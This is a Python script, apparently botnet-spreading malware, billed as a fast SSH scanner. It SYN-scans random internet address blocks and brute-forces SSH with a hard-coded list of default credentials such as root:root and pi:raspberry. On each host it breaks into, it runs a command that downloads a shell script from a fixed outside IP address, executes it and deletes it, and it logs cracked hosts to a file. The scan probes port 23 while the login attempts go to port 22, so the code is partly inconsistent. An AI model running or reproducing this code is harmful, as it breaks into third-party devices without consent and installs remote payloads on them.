import logging
from scapy.all import *
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Disable the annoying No Route found warning !
import sys, re, os, paramiko, socket, random, itertools
from threading import Thread
from time import sleep
paramiko.util.log_to_file("/dev/null")
rekdevice="cd /tmp; wget http://185.10.68.196/update.sh; busybox wget http://185.10.68.196/update.sh; chmod 777 update.sh; sh update.sh; rm -f update.sh" #command to send

print "S-S-SUUUPER fast SSH scanner by Freak"
print

maxthreads = int(raw_input("Threads: "))

global fh
fh = open("vulnz.txt","a+")

global passwords
passwords = [
    "root:root",
    "root:admin",
    "root:password",
    "root:default",
    "root:toor",
    "admin:admin",
    "admin:1234",
    "ubnt:ubnt",
    "vagrant:vagrant",
    "root:ubnt",
    "telnet:telnet",
    "guest:guest",
    "root:vagrant",
    "pi:raspberry",
    "default:",
    "admin:password",
    "cisco:cisco",
    "root:5up",
    "user:password",
    "user:user",
    "root:debian",
    "root:alpine",
    "root:ceadmin",
    "root:indigo",
    "root:linux",
    "root:rootpasswd",
    "root:timeserver"
]


def SSHBrute(IP):
    global fh
    global passwords
    cracked = False
    for passwd in passwords:
        if cracked:
            return
        try:
            ssh = paramiko.SSHClient()
            ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            ssh.connect(IP, port = 22, username=passwd.split(":")[0], password=passwd.split(":")[1], key_filename=None, timeout=3)
            print "Freaks next root ->"+ passwd + ":" + IP
            cracked = True
            fh.write(passwd + ":" + IP + "\n")
            fh.flush()
            ssh.exec_command(rekdevice)
            sleep(20)
            ssh.close()
        except Exception as e:
            pass
            
def cook(pkt):
    try:
        global fh
        if pkt[TCP].flags == 18 and pkt[IP].src:
            print "22 port opened: %s " % (pkt[IP].src)
            threadstarted = False
            while not threadstarted:
                try:
                    Thread(target = SSHBrute, args = (pkt[IP].src,)).start()
                    threadstarted = True
                except:
                    pass
                sleep(1)
    except Exception as e:
        pass

def sniffer():
    sniff(filter="tcp and dst port 1337 and src port 23", prn=cook)

def gen_IP_block():
    first = random.choice(["2", "5", "31", "37", "46", "94", "95", "118", "119", "122", "161", "168", "176", "178", "179", "180", "183", "185", "187", "188", "191", "198", "201"])
    ip = ".".join([str(first),str(random.randrange(1,256)),
    str(random.randrange(1,256))])
    return ip+".0-255"

def ip_range(input_string, timeout=0.2):
    octets = input_string.split('.')
    chunks = [map(int, octet.split('-')) for octet in octets]
    ranges = [range(c[0], c[1] + 1) if len(c) == 2 else c for c in chunks]
    s = conf.L3socket(iface='eth0')
    for address in itertools.product(*ranges):
        address ='.'.join(map(str, address))
        pkt = IP()/TCP(sport=1337, dport=23, flags="S")
        pkt[IP].dst = address
        s.send(pkt)

def HaxThread():
    while 1:
        ip_range(gen_IP_block())

Thread(target = sniffer, args = ()).start()
global threads
threads = 0
for i in xrange(0,maxthreads):
    try:
        Thread(target = HaxThread, args = ()).start()
        threads += 1
    except Exception as e:
        pass

print "Started " + str(threads) + " scanner threads! Press enter to stop."

raw_input()
os.kill(os.getpid(), 9)